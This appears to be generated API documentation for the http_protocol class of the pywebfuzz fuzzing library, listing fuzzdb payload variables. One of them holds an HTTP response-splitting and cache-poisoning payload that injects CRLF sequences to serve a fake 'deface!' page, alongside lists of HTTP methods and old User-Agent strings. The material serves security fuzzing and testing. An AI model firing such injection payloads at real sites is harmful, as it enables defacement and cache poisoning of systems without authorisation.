Package pywebfuzz :: Module fuzzdb :: Class attack_payloads :: Class http_protocol
[hide private]
[frames] | no frames]

Class http_protocol

This implements the http-protocol from fuzzdb

Class Variables [hide private]
  http_header_cache_poison = ['GET http://{SITE}testsite.com/red...
  http_protocol_methods = ['OPTIONS', 'GET', 'HEAD', 'POST', 'PU...
  location = '/data/attack-payloads/http-protocol/user-agents.txt'
  user_agents = ['User-Agent: Mozilla/1.22 (compatible; MSIE 2.0...
Class Variable Details [hide private]

http_header_cache_poison

Value:
['GET http://{SITE}testsite.com/redir.php?site=%0d%0aContent-Length:%2\
00%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oc\
t%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:\
%20text/html%0d%0a%0d%0a<html>deface!</html> HTTP/1.1GET http://{SITE}\
/{REDIRECTURL}?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%2020\
0%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0\
d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<ht\
ml>deface!</html> HTTP/1.1',
...

http_protocol_methods

Value:
['OPTIONS',
 'GET',
 'HEAD',
 'POST',
 'PUT',
 'DELETE',
 'TRACE',
 'CONNECT',
...

user_agents

Value:
['User-Agent: Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)',
 'User-Agent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT\
)',
 'User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)',
 'User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)',
 'User-Agent: Mozilla/4.79 [en] (WinNT; U)',
 'User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Geck\
o/20010726 Netscape6/6.1',
...